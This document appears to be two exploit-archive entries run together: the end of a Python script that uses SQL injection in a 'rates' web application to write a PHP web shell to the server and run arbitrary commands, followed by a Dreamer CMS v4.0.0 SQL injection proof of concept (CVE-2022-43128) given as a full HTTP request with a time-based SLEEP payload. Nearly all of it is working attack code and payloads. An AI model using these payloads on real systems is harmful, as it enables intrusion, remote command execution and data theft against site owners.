"""'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME) # Write the PHP file to disk using the SQL injection vulnerability url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli) r1 = s.get(url1) # Execute the user defined command and display the result url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd) r2 = s.get(url2) print(r2.text) if __name__ == '__main__': main()

# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection # Date: 2022/10/02 # Exploit Author: lvren # Vendor Homepage: http://cms.iteachyou.cc/ # Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip # Version: v4.0.0 # CVE: CVE-2022-43128 Proof Of Concept: POST /admin/search/doSearch HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 80 Origin: http://localhost:8888 Connection: close Referer: http://localhost:8888/admin/search/doSearch Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739 Upgrade-Insecure-Requests: 1 entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386 lvren [email protected] 签名由 网易灵犀办公 定制